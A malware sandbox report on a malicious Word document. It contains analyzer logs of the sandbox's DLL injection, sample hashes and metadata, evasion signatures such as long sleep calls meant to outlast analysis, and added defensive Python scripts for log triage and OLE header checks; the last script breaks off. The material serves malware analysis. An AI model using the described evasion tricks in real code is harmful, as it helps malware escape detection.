2019-10-10 01:12:20,325 [root] DEBUG: DLL unloaded from 0x000007FEFA960000.
2019-10-10 01:12:20,513 [root] DEBUG: DLL unloaded from 0x000007FEF78B0000.
2019-10-10 01:12:20,513 [root] DEBUG: DLL unloaded from 0x6B930000.
2019-10-10 01:12:20,559 [root] DEBUG: DLL unloaded from 0x000007FEFA960000.
2019-10-10 01:12:20,591 [root] DEBUG: DLL unloaded from 0x000007FEF92D0000.
2019-10-10 01:12:20,716 [root] DEBUG: DLL unloaded from 0x000007FEFA960000.
2019-10-10 01:12:20,732 [root] DEBUG: DLL unloaded from 0x000007FEF92D0000.
2019-10-10 01:12:20,857 [root] DEBUG: DLL loaded at 0x6AF90000: C:\Windows\system32\USERENV (0x17000 bytes).
2019-10-10 01:12:20,871 [root] INFO: Announced 32-bit process name: FLTLDR.EXE pid: 1884
2019-10-10 01:12:20,871 [lib.api.process] INFO: 32-bit DLL to inject is C:\weesndvahu\dll\GSqAxLd.dll, loader C:\weesndvahu\bin\zyKKHPv.exe
2019-10-10 01:12:20,888 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\MdgGvTgKXB.
2019-10-10 01:12:20,888 [root] DEBUG: Loader: Injecting process 1884 (thread 1940) with C:\weesndvahu\dll\GSqAxLd.dll.
2019-10-10 01:12:20,888 [root] DEBUG: Process image base: 0x2DFD0000
2019-10-10 01:12:20,888 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\weesndvahu\dll\GSqAxLd.dll.
2019-10-10 01:12:20,888 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x2DFEF000 - 0x77380000
2019-10-10 01:12:20,888 [root] DEBUG: InjectDllViaIAT: Allocated 0x1c8 bytes for new import table at 0x2DFF0000.
2019-10-10 01:12:20,888 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-10-10 01:12:20,888 [root] DEBUG: Successfully injected DLL C:\weesndvahu\dll\GSqAxLd.dll.
2019-10-10 01:12:20,888 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1884
2019-10-10 01:12:20,903 [root] INFO: Announced 32-bit process name: FLTLDR.EXE pid: 1884
2019-10-10 01:12:20,903 [lib.api.process] INFO: 32-bit DLL to inject is C:\weesndvahu\dll\GSqAxLd.dll, loader C:\weesndvahu\bin\zyKKHPv.exe
2019-10-10 01:12:20,918 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\MdgGvTgKXB.
2019-10-10 01:12:20,918 [root] DEBUG: Loader: Injecting process 1884 (thread 1940) with C:\weesndvahu\dll\GSqAxLd.dll.
2019-10-10 01:12:20,918 [root] DEBUG: Process image base: 0x2DFD0000
2019-10-10 01:12:20,918 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\weesndvahu\dll\GSqAxLd.dll.
2019-10-10 01:12:20,918 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2019-10-10 01:12:20,918 [root] DEBUG: Successfully injected DLL C:\weesndvahu\dll\GSqAxLd.dll.
2019-10-10 01:12:20,918 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1884
2019-10-10 01:12:22,681 [root] DEBUG: DLL unloaded from 0x76A70000.
2019-10-10 01:12:40,964 [root] INFO: Announced 32-bit process name: FLTLDR.EXE pid: 2820
2019-10-10 01:12:40,964 [lib.api.process] INFO: 32-bit DLL to inject is C:\weesndvahu\dll\GSqAxLd.dll, loader C:\weesndvahu\bin\zyKKHPv.exe
2019-10-10 01:12:40,964 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\MdgGvTgKXB.
2019-10-10 01:12:40,980 [root] DEBUG: Loader: Injecting process 2820 (thread 2628) with C:\weesndvahu\dll\GSqAxLd.dll.
2019-10-10 01:12:40,980 [root] DEBUG: Process image base: 0x2DAD0000
2019-10-10 01:12:40,980 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\weesndvahu\dll\GSqAxLd.dll.
2019-10-10 01:12:40,980 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x2DAEF000 - 0x77380000
2019-10-10 01:12:40,980 [root] DEBUG: InjectDllViaIAT: Allocated 0x1c8 bytes for new import table at 0x2DAF0000.
2019-10-10 01:12:40,980 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-10-10 01:12:40,980 [root] DEBUG: Successfully injected DLL C:\weesndvahu\dll\GSqAxLd.dll.
2019-10-10 01:12:40,980 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2820
2019-10-10 01:12:40,980 [root] INFO: Announced 32-bit process name: FLTLDR.EXE pid: 2820
2019-10-10 01:12:40,980 [lib.api.process] INFO: 32-bit DLL to inject is C:\weesndvahu\dll\GSqAxLd.dll, loader C:\weesndvahu\bin\zyKKHPv.exe
2019-10-10 01:12:40,980 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\MdgGvTgKXB.
2019-10-10 01:12:40,980 [root] DEBUG: Loader: Injecting process 2820 (thread 2628) with C:\weesndvahu\dll\GSqAxLd.dll.
2019-10-10 01:12:40,980 [root] DEBUG: Process image base: 0x2DAD0000
2019-10-10 01:12:40,980 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\weesndvahu\dll\GSqAxLd.dll.
2019-10-10 01:12:40,980 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2019-10-10 01:12:40,980 [root] DEBUG: Successfully injected DLL C:\weesndvahu\dll\GSqAxLd.dll.
2019-10-10 01:12:40,980 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2820
2019-10-10 01:12:41,012 [root] DEBUG: DLL loaded at 0x6AF80000: C:\Windows\system32\mssprxy (0xc000 bytes).
2019-10-10 01:12:41,012 [root] DEBUG: DLL unloaded from 0x75B20000.
2019-10-10 01:13:01,088 [root] DEBUG: set_caller_info: Adding region at 0x05B60000 to caller regions list (ntdll::memcpy).
2019-10-10 01:13:01,417 [root] INFO: Announced 32-bit process name: FLTLDR.EXE pid: 2500
2019-10-10 01:13:01,417 [lib.api.process] INFO: 32-bit DLL to inject is C:\weesndvahu\dll\GSqAxLd.dll, loader C:\weesndvahu\bin\zyKKHPv.exe
2019-10-10 01:13:01,431 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\MdgGvTgKXB.
2019-10-10 01:13:01,431 [root] DEBUG: Loader: Injecting process 2500 (thread 3020) with C:\weesndvahu\dll\GSqAxLd.dll.
2019-10-10 01:13:01,431 [root] DEBUG: Process image base: 0x2DA70000
2019-10-10 01:13:01,431 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\weesndvahu\dll\GSqAxLd.dll.
2019-10-10 01:13:01,431 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x2DA8F000 - 0x77380000
2019-10-10 01:13:01,431 [root] DEBUG: InjectDllViaIAT: Allocated 0x1c8 bytes for new import table at 0x2DA90000.
2019-10-10 01:13:01,431 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-10-10 01:13:01,431 [root] DEBUG: Successfully injected DLL C:\weesndvahu\dll\GSqAxLd.dll.
2019-10-10 01:13:01,431 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2500
2019-10-10 01:13:01,431 [root] INFO: Announced 32-bit process name: FLTLDR.EXE pid: 2500
2019-10-10 01:13:01,431 [lib.api.process] INFO: 32-bit DLL to inject is C:\weesndvahu\dll\GSqAxLd.dll, loader C:\weesndvahu\bin\zyKKHPv.exe
2019-10-10 01:13:01,431 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\MdgGvTgKXB.
2019-10-10 01:13:01,431 [root] DEBUG: Loader: Injecting process 2500 (thread 3020) with C:\weesndvahu\dll\GSqAxLd.dll.
2019-10-10 01:13:01,431 [root] DEBUG: Process image base: 0x2DA70000
2019-10-10 01:13:01,431 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\weesndvahu\dll\GSqAxLd.dll.
2019-10-10 01:13:01,447 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2019-10-10 01:13:01,447 [root] DEBUG: Successfully injected DLL C:\weesndvahu\dll\GSqAxLd.dll.
2019-10-10 01:13:01,447 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2500
2019-10-10 01:13:14,286 [root] DEBUG: DLL unloaded from 0x000007FEFE710000.
2019-10-10 01:13:21,477 [root] INFO: Announced 32-bit process name: FLTLDR.EXE pid: 2192
2019-10-10 01:13:21,477 [lib.api.process] INFO: 32-bit DLL to inject is C:\weesndvahu\dll\GSqAxLd.dll, loader C:\weesndvahu\bin\zyKKHPv.exe
2019-10-10 01:13:21,477 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\MdgGvTgKXB.
2019-10-10 01:13:21,477 [root] DEBUG: Loader: Injecting process 2192 (thread 1504) with C:\weesndvahu\dll\GSqAxLd.dll.
2019-10-10 01:13:21,477 [root] DEBUG: Process image base: 0x2D3A0000
2019-10-10 01:13:21,477 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\weesndvahu\dll\GSqAxLd.dll.
2019-10-10 01:13:21,477 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x2D3BF000 - 0x77380000
2019-10-10 01:13:21,477 [root] DEBUG: InjectDllViaIAT: Allocated 0x1c8 bytes for new import table at 0x2D3C0000.
2019-10-10 01:13:21,477 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-10-10 01:13:21,477 [root] DEBUG: Successfully injected DLL C:\weesndvahu\dll\GSqAxLd.dll.
2019-10-10 01:13:21,477 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2192
2019-10-10 01:13:21,493 [root] INFO: Announced 32-bit process name: FLTLDR.EXE pid: 2192
2019-10-10 01:13:21,493 [lib.api.process] INFO: 32-bit DLL to inject is C:\weesndvahu\dll\GSqAxLd.dll, loader C:\weesndvahu\bin\zyKKHPv.exe
2019-10-10 01:13:21,493 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\MdgGvTgKXB.
2019-10-10 01:13:21,493 [root] DEBUG: Loader: Injecting process 2192 (thread 1504) with C:\weesndvahu\dll\GSqAxLd.dll.
2019-10-10 01:13:21,493 [root] DEBUG: Process image base: 0x2D3A0000
2019-10-10 01:13:21,493 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\weesndvahu\dll\GSqAxLd.dll.
2019-10-10 01:13:21,493 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2019-10-10 01:13:21,493 [root] DEBUG: Successfully injected DLL C:\weesndvahu\dll\GSqAxLd.dll.
2019-10-10 01:13:21,493 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2192
2019-10-10 01:13:42,257 [root] DEBUG: DLL loaded at 0x3F100000: C:\Program Files (x86)\Microsoft Office\OFFICE14\PROOF\1033\MSGR3EN (0x311000 bytes).
2019-10-10 01:13:42,335 [root] DEBUG: set_caller_info: Adding region at 0x0B510000 to caller regions list (advapi32::RegCreateKeyExA).
2019-10-10 01:13:42,726 [root] DEBUG: set_caller_info: Adding region at 0x00650000 to caller regions list (kernel32::FindResourceExW).
2019-10-10 01:13:43,740 [root] DEBUG: set_caller_info: Adding region at 0x0BC20000 to caller regions list (ntdll::memcpy).
2019-10-10 01:13:44,487 [root] DEBUG: set_caller_info: Adding region at 0x001F0000 to caller regions list (ntdll::NtYieldExecution).
2019-10-10 01:13:45,392 [root] DEBUG: set_caller_info: Adding region at 0x0BE80000 to caller regions list (kernel32::FindResourceExW).
2019-10-10 01:13:46,719 [root] DEBUG: set_caller_info: Adding region at 0x00980000 to caller regions list (msvcrt::memcpy).
2019-10-10 01:13:46,734 [root] DEBUG: set_caller_info: Adding region at 0x00020000 to caller regions list (msvcrt::memcpy).
2019-10-10 01:13:47,874 [modules.auxiliary.human] INFO: Closing Office window.
2019-10-10 01:13:48,279 [root] DEBUG: DLL unloaded from 0x3F100000.
2019-10-10 01:13:48,309 [root] DEBUG: DLL unloaded from 0x70450000.
2019-10-10 01:13:48,325 [root] DEBUG: DLL unloaded from 0x70240000.
2019-10-10 01:13:48,357 [root] DEBUG: DLL unloaded from 0x76A70000.
2019-10-10 01:13:48,466 [root] DEBUG: DLL unloaded from 0x74BE0000.
2019-10-10 01:13:48,466 [root] DEBUG: DLL unloaded from 0x6AF50000.
2019-10-10 01:13:48,466 [root] DEBUG: DLL unloaded from 0x74BE0000.
2019-10-10 01:13:48,466 [root] DEBUG: DLL unloaded from 0x76EA0000.
2019-10-10 01:13:48,466 [root] DEBUG: DLL unloaded from 0x6AFB0000.
2019-10-10 01:13:48,466 [root] DEBUG: DLL unloaded from 0x65300000.
2019-10-10 01:13:48,591 [root] DEBUG: DLL loaded at 0x74D70000: C:\Windows\system32\POWRPROF (0x25000 bytes).
2019-10-10 01:13:48,591 [root] DEBUG: DLL unloaded from 0x74D70000.
2019-10-10 01:13:48,607 [root] DEBUG: DLL unloaded from 0x76EA0000.
2019-10-10 01:13:48,607 [root] DEBUG: DLL unloaded from 0x76A70000.
2019-10-10 01:13:48,607 [root] DEBUG: DLL unloaded from 0x6AF10000.
2019-10-10 01:13:48,607 [root] DEBUG: DLL unloaded from 0x6BA50000.
2019-10-10 01:13:48,607 [root] DEBUG: DLL unloaded from 0x77050000.
2019-10-10 01:13:48,607 [root] DEBUG: DLL unloaded from 0x6B9D0000.
2019-10-10 01:13:48,621 [root] DEBUG: DLL unloaded from 0x73E00000.
2019-10-10 01:13:48,638 [root] DEBUG: DLL unloaded from 0x2FA00000.
2019-10-10 01:13:48,638 [root] DEBUG: DLL unloaded from 0x6B990000.
2019-10-10 01:13:48,638 [root] DEBUG: DLL unloaded from 0x77050000.
2019-10-10 01:13:48,746 [root] DEBUG: DLL unloaded from 0x75B20000.
2019-10-10 01:13:48,746 [root] DEBUG: DLL unloaded from 0x74AF0000.
2019-10-10 01:13:48,746 [root] DEBUG: DLL unloaded from 0x70240000.
2019-10-10 01:13:48,763 [root] DEBUG: DLL unloaded from 0x6B930000.
2019-10-10 01:13:48,763 [root] DEBUG: DLL unloaded from 0x77050000.
2019-10-10 01:13:48,763 [root] DEBUG: DLL unloaded from 0x74B00000.
2019-10-10 01:13:48,763 [root] DEBUG: DLL unloaded from 0x76FC0000.
2019-10-10 01:13:48,763 [root] DEBUG: DLL unloaded from 0x6B990000.
2019-10-10 01:13:48,809 [root] DEBUG: DLL unloaded from 0x000007FEF9A50000.
2019-10-10 01:13:48,809 [root] DEBUG: DLL unloaded from 0x000007FEF7880000.
2019-10-10 01:13:48,825 [root] WARNING: File at path "C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRC0000.tmp" does not exist, skip.
2019-10-10 01:13:48,825 [root] DEBUG: DLL unloaded from 0x75A50000.
2019-10-10 01:13:48,841 [root] DEBUG: DLL unloaded from 0x6B830000.
2019-10-10 01:13:48,903 [root] DEBUG: DLL unloaded from 0x77050000.
2019-10-10 01:13:48,903 [root] DEBUG: DLL unloaded from 0x75700000.
2019-10-10 01:13:48,903 [root] DEBUG: DLL unloaded from 0x74BB0000.
2019-10-10 01:13:48,903 [root] INFO: Notified of termination of process with pid 2360.
2019-10-10 01:13:49,371 [root] INFO: Process with pid 2360 has terminated
2019-10-10 01:13:57,811 [root] DEBUG: DLL unloaded from 0x000007FEFC760000.
2019-10-10 01:13:57,825 [root] DEBUG: DLL unloaded from 0x000007FEFE6E0000.
2019-10-10 01:13:57,825 [root] INFO: Notified of termination of process with pid 2616.
2019-10-10 01:13:58,528 [root] INFO: Process with pid 2616 has terminated
2019-10-10 01:15:20,694 [root] INFO: Analysis timeout hit (200 seconds), terminating analysis.
2019-10-10 01:15:20,694 [root] INFO: Created shutdown mutex.
2019-10-10 01:15:21,707 [lib.api.process] INFO: Successfully received reply to terminate_event, pid 1708
2019-10-10 01:15:21,707 [root] INFO: Terminate event set for process 1708.
2019-10-10 01:15:21,707 [root] DEBUG: Terminate Event: Skipping dump of process 1708
2019-10-10 01:15:21,707 [root] INFO: Terminating process 1708 before shutdown.
2019-10-10 01:15:21,707 [root] DEBUG: Terminate Event: Shutdown complete for process 1708 but failed to inform analyzer.
2019-10-10 01:15:21,707 [root] INFO: Waiting for process 1708 to exit.
2019-10-10 01:15:22,710 [root] INFO: Shutting down package.
2019-10-10 01:15:22,710 [root] INFO: Stopping auxiliary modules.
2019-10-10 01:15:22,710 [root] INFO: Finishing auxiliary modules.
2019-10-10 01:15:22,710 [root] INFO: Shutting down pipe server and dumping dropped files.
2019-10-10 01:15:22,710 [root] WARNING: File at path "C:\ULEoWPzTY\debugger" does not exist, skip.
2019-10-10 01:15:22,710 [root] WARNING: Monitor injection attempted but failed for process 154729807.
2019-10-10 01:15:22,710 [root] WARNING: Monitor injection attempted but failed for process 1.
2019-10-10 01:15:22,710 [root] WARNING: Monitor injection attempted but failed for process 1884.
2019-10-10 01:15:22,710 [root] WARNING: Monitor injection attempted but failed for process 2820.
2019-10-10 01:15:22,710 [root] WARNING: Monitor injection attempted but failed for process 2500.
2019-10-10 01:15:22,720 [root] WARNING: Monitor injection attempted but failed for process 2192.
2019-10-10 01:15:22,720 [root] INFO: Analysis completed.
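The injection lines above repeat one pattern for every FLTLDR.EXE child: the loader announces the pid, allocates 0x1c8 bytes for a replacement import table in the first free region above the image (0x20000 past the image base in both fully logged cases), patches the IAT, and on its second pass reports the image as already patched. At shutdown the same pids reappear in "Monitor injection attempted but failed" warnings, together with two pids (154729807 and 1) that do not look like Windows process IDs at all. The script below is an added example, not part of CAPE or of this report: it reduces the log to one record per pid and flags those inconsistencies. The embedded excerpt is copied from the lines above; the multiple-of-4 pid test is a heuristic added by the editor, not a CAPE check.

```python
import re
from collections import OrderedDict

# Patterns for the analyzer log lines that describe CAPE's IAT-patch injection.
RE_ANNOUNCE = re.compile(r"Announced (?:32|64)-bit process name: (\S+) pid: (\d+)")
RE_INJECT = re.compile(r"Loader: Injecting process (\d+) \(thread (\d+)\)")
RE_BASE = re.compile(r"Process image base: 0x([0-9A-Fa-f]+)")
RE_ALLOC = re.compile(r"Allocated 0x([0-9A-Fa-f]+) bytes for new import table at 0x([0-9A-Fa-f]+)")
RE_ALREADY = re.compile(r"This image has already been patched")
RE_FAILED = re.compile(r"Monitor injection attempted but failed for process (\d+)")

# Excerpt of the analyzer log above: pids 2500 and 2192 plus the shutdown warnings.
SAMPLE_LOG = r"""
2019-10-10 01:13:01,417 [root] INFO: Announced 32-bit process name: FLTLDR.EXE pid: 2500
2019-10-10 01:13:01,431 [root] DEBUG: Loader: Injecting process 2500 (thread 3020) with C:\weesndvahu\dll\GSqAxLd.dll.
2019-10-10 01:13:01,431 [root] DEBUG: Process image base: 0x2DA70000
2019-10-10 01:13:01,431 [root] DEBUG: InjectDllViaIAT: Allocated 0x1c8 bytes for new import table at 0x2DA90000.
2019-10-10 01:13:01,431 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-10-10 01:13:01,431 [root] DEBUG: Loader: Injecting process 2500 (thread 3020) with C:\weesndvahu\dll\GSqAxLd.dll.
2019-10-10 01:13:01,431 [root] DEBUG: Process image base: 0x2DA70000
2019-10-10 01:13:01,447 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2019-10-10 01:13:21,477 [root] INFO: Announced 32-bit process name: FLTLDR.EXE pid: 2192
2019-10-10 01:13:21,477 [root] DEBUG: Loader: Injecting process 2192 (thread 1504) with C:\weesndvahu\dll\GSqAxLd.dll.
2019-10-10 01:13:21,477 [root] DEBUG: Process image base: 0x2D3A0000
2019-10-10 01:13:21,477 [root] DEBUG: InjectDllViaIAT: Allocated 0x1c8 bytes for new import table at 0x2D3C0000.
2019-10-10 01:13:21,477 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-10-10 01:15:22,710 [root] WARNING: Monitor injection attempted but failed for process 154729807.
2019-10-10 01:15:22,710 [root] WARNING: Monitor injection attempted but failed for process 1.
2019-10-10 01:15:22,710 [root] WARNING: Monitor injection attempted but failed for process 2500.
2019-10-10 01:15:22,720 [root] WARNING: Monitor injection attempted but failed for process 2192.
"""


def new_record(pid):
    return {"pid": pid, "name": None, "image_base": None, "new_iat": None,
            "iat_size": None, "attempts": [], "failed_at_shutdown": False}


def parse_injections(log_text):
    """One record per pid, in first-seen order, built from the injection lines."""
    procs, current = OrderedDict(), None
    for line in log_text.strip().splitlines():
        if m := RE_ANNOUNCE.search(line):
            procs.setdefault(int(m.group(2)), new_record(int(m.group(2))))["name"] = m.group(1)
        elif m := RE_INJECT.search(line):
            current = procs.setdefault(int(m.group(1)), new_record(int(m.group(1))))
        elif m := RE_FAILED.search(line):
            procs.setdefault(int(m.group(1)), new_record(int(m.group(1))))["failed_at_shutdown"] = True
        elif current is None:
            continue  # detail lines before any "Injecting process" line have no owner
        elif m := RE_BASE.search(line):
            current["image_base"] = int(m.group(1), 16)
        elif m := RE_ALLOC.search(line):
            current["iat_size"], current["new_iat"] = int(m.group(1), 16), int(m.group(2), 16)
            current["attempts"].append("patched")
        elif RE_ALREADY.search(line):
            current["attempts"].append("already_patched")
    return procs


def plausible_windows_pid(pid):
    # Heuristic (editor's assumption): Windows process IDs are positive multiples of 4.
    return pid > 0 and pid % 4 == 0


def triage(procs):
    """Findings a reviewer of this log would want to see, as (pid, message) pairs."""
    findings = []
    for pid, r in procs.items():
        if not plausible_windows_pid(pid):
            findings.append((pid, "implausible Windows pid"))
            continue
        if r["new_iat"] is not None and r["new_iat"] <= (r["image_base"] or 0):
            findings.append((pid, "new import table not above image base"))
        if r["attempts"].count("patched") > 1:
            findings.append((pid, "IAT patched more than once"))
        if "patched" in r["attempts"] and r["failed_at_shutdown"]:
            findings.append((pid, "IAT patched but shutdown reports injection failed"))
    return findings


if __name__ == "__main__":
    procs = parse_injections(SAMPLE_LOG)
    for pid, r in procs.items():
        print(pid, r["name"], r["attempts"], hex(r["new_iat"]) if r["new_iat"] else "-")
    for pid, msg in triage(procs):
        print("FINDING pid %d: %s" % (pid, msg))
```

Run against the full log, the "patched but shutdown reports failed" finding is the one to chase: it means the monitor DLL was wired into the child's import table, yet the analyzer never got a working channel from that process, so whatever FLTLDR.EXE did with the document's embedded images is not covered by the behaviour trace.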

MalScore

10.0

Malicious

Machine

Name target-02
Label target-02
Manager ESX
Started On 2019-10-10 00:11:52
Shutdown On 2019-10-10 00:16:24

File Details

File Name tmpsh5v7u_m
File Size 4200960 bytes
File Type Composite Document File V2 Document, Little Endian, Os: MacOS, Version 10.3, Code page: 10000, Title: Brain Coffee Co. Preliminary Business Plan, Subject: December 2003, Author: Patrick Feld, Template: Normal, Last Saved By: Mark Portrait, Revision Number: 28, Name of Creating Application: Microsoft Word 9.0, Total Editing Time: 10:27:00, Create Time/Date: Thu Dec 11 04:58:00 2003, Last Saved Time/Date: Fri Dec 19 21:44:00 2003, Number of Pages: 42, Number of Words: 14927, Number of Characters: 85085, Security: 2
MD5 7cad33500a32cf4335f4553922650ef2
SHA1 fc1619f581f8fa976bf6ca42aa856818775ddbfe
SHA256 31cb9054db8cfa48e2bac12b291ef7581cc4b96a8d47d0167465f1fd16436fd5
SHA512 a2e5dc8cd8dafd1adf1f2c478e24b6e345c585300cb2efb160ab6c1c808a7bb6c114e40c42088880b9080e38da20bb8d634b10e5623727c18c8ba8e35ef27c3f
CRC32 C3C994F9
Ssdeep 98304:blM+Qge+ZdqmvEReVpydCQMlM+Qge+Zdqm:ucZdqmRQCQNcZdqm
TrID
  • 35.5% (.XLS) Microsoft Excel sheet (32500/1/3)
  • 34.9% (.DOC) Microsoft Word document (32000/1/3)
  • 20.7% (.DOC) Microsoft Word document (old ver.) (19000/1/2)
  • 8.7% (.) Generic OLE2 / Multistream Compound File (8000/1)
ClamAV None matched
Yara None matched
CAPE Yara None matched
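The File Type line is the libmagic description of the CFB (OLE2) container plus the document's SummaryInformation stream, and TrID splits its vote between Excel and Word because both live in the same container format. The parser below is an added example, not CAPE code: it decodes the 512-byte MS-CFB header, applies the format's consistency rules (byte-order mark, version-to-sector-shift pairing, in-header DIFAT entry count) and checks that a file size splits into whole sectors. The reported size of 4200960 bytes is the header plus exactly 8204 sectors of 512 bytes, as expected for a version 3 file. The header parsed when the script runs without a path is constructed here, not taken from the sample.

```python
import struct
import sys

# Fixed 512-byte header of an MS-CFB (OLE2, "Composite Document File V2") file.
CFB_MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"
HEADER_FMT = "<8s16sHHHHH6sIIIIIIIII"  # signature .. DIFAT sector count (offsets 0x00-0x4B)
DIFAT_FMT = "<109I"                     # in-header DIFAT (offsets 0x4C-0x1FF)
HEADER_LEN = 512
ENDOFCHAIN = 0xFFFFFFFE
FREESECT = 0xFFFFFFFF


def parse_cfb_header(data):
    """Decode the header fields and attach a list of spec-consistency issues."""
    if len(data) < HEADER_LEN:
        raise ValueError("need %d header bytes, got %d" % (HEADER_LEN, len(data)))
    (sig, clsid, minor, major, byte_order, sector_shift, mini_shift, _reserved,
     n_dir, n_fat, first_dir, _txn, mini_cutoff, first_minifat, n_minifat,
     first_difat, n_difat) = struct.unpack_from(HEADER_FMT, data, 0)
    if sig != CFB_MAGIC:
        raise ValueError("not a CFB file (signature %s)" % sig.hex())
    difat = struct.unpack_from(DIFAT_FMT, data, 0x4C)
    hdr = {
        "minor_version": minor, "major_version": major, "byte_order": byte_order,
        "sector_shift": sector_shift, "sector_size": 1 << sector_shift,
        "mini_sector_shift": mini_shift, "mini_sector_size": 1 << mini_shift,
        "dir_sectors": n_dir, "fat_sectors": n_fat, "first_dir_sector": first_dir,
        "mini_stream_cutoff": mini_cutoff, "first_minifat_sector": first_minifat,
        "minifat_sectors": n_minifat, "first_difat_sector": first_difat,
        "difat_sectors": n_difat, "clsid_is_zero": clsid == b"\0" * 16,
        "header_difat": [s for s in difat if s != FREESECT],  # used entries only
    }
    hdr["issues"] = sanity_check(hdr)
    return hdr


def sanity_check(hdr):
    """Rules from the MS-CFB header spec; a non-empty list means the file is
    malformed or tampered with even though the signature is intact."""
    issues = []
    if hdr["byte_order"] != 0xFFFE:
        issues.append("byte order marker 0x%04X is not 0xFFFE" % hdr["byte_order"])
    expected_shift = {3: 9, 4: 12}.get(hdr["major_version"])
    if expected_shift is None:
        issues.append("unknown major version %d" % hdr["major_version"])
    elif hdr["sector_shift"] != expected_shift:
        issues.append("sector shift %d does not match major version %d"
                      % (hdr["sector_shift"], hdr["major_version"]))
    if hdr["major_version"] == 3 and hdr["dir_sectors"] != 0:
        issues.append("version 3 files must record 0 directory sectors")
    if hdr["mini_sector_shift"] != 6:
        issues.append("mini sector shift %d is not 6" % hdr["mini_sector_shift"])
    if hdr["mini_stream_cutoff"] != 0x1000:
        issues.append("mini stream cutoff 0x%X is not 0x1000" % hdr["mini_stream_cutoff"])
    if hdr["fat_sectors"] < 1:
        issues.append("no FAT sectors")
    expected_entries = min(hdr["fat_sectors"], 109)
    if len(hdr["header_difat"]) != expected_entries:
        issues.append("in-header DIFAT has %d entries, expected %d"
                      % (len(hdr["header_difat"]), expected_entries))
    if hdr["fat_sectors"] > 109 and hdr["difat_sectors"] == 0:
        issues.append("more than 109 FAT sectors but no DIFAT sectors")
    return issues


def sector_layout(file_size, sector_size):
    """(whole sectors after the header, trailing bytes that belong to no sector)."""
    body = file_size - HEADER_LEN
    return body // sector_size, body % sector_size


def build_sample_header():
    """Constructed minimal version 3 header (not bytes from the analysed sample):
    one FAT sector at sector 0, directory at sector 1, no mini FAT, no DIFAT sectors."""
    fixed = struct.pack(HEADER_FMT, CFB_MAGIC, b"\0" * 16, 0x3E, 3, 0xFFFE, 9, 6, b"\0" * 6,
                        0, 1, 1, 0, 0x1000, ENDOFCHAIN, 0, ENDOFCHAIN, 0)
    return fixed + struct.pack(DIFAT_FMT, 0, *([FREESECT] * 108))


if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read(HEADER_LEN) if len(sys.argv) > 1 else build_sample_header()
    hdr = parse_cfb_header(data)
    for key in ("major_version", "sector_size", "fat_sectors", "first_dir_sector", "difat_sectors"):
        print("%-18s %s" % (key, hdr[key]))
    print("issues:", hdr["issues"] or "none")
```

The header check is deliberately independent of `file` and TrID: a crafted document can keep the 8-byte signature intact while carrying a sector shift, DIFAT count or cutoff that Office tolerates but the spec forbids, and those are the cases where parser-targeting content tends to hide. Trailing bytes reported by `sector_layout` are data outside every sector chain and deserve a look on their own.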

Signatures

SetUnhandledExceptionFilter detected (possible anti-debug)
A process attempted to delay the analysis task.
Process: splwow64.exe tried to sleep 1320 seconds, actually delayed analysis time by 0 seconds
Process: WINWORD.EXE tried to sleep 570 seconds, actually delayed analysis time by 0 seconds
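Two of these signatures are best read together. Both sleep requests (1320 s and 570 s) are longer than the 200 s analysis timeout recorded in the log, so had the sandbox honoured them the run would have ended before anything scheduled after the sleep executed; the "delayed analysis time by 0 seconds" part is the sleep-skipping at work. The long DynamicLoader list that follows is mostly Word's own late binding, and the entries with nothing after the slash are resolutions for which the monitor recorded no function name (typically a lookup by ordinal). The script below is an added example, not CAPE's signature code: it parses both kinds of line, computes the per-process sleep budget against the timeout, collapses the loader list into per-DLL counts, and reports hits against a small watch-list chosen by the editor (VBA engine and VBA security initialisation, COM instantiation, LoadLibraryW). That watch-list is a triage assumption, not a verdict, and the sample text is a constructed excerpt of lines from this page.

```python
import re
from collections import defaultdict

ANALYSIS_TIMEOUT_S = 200  # "timeout set to: 200" in the analyzer log above

RE_SLEEP = re.compile(r"Process: (\S+) tried to sleep (\d+) seconds, "
                      r"actually delayed analysis time by (\d+) seconds")
RE_DYNLOAD = re.compile(r"DynamicLoader: ([^/\s]+)/(\S*)")

# Editor's watch-list (assumption, not a CAPE rule): resolutions worth a second look
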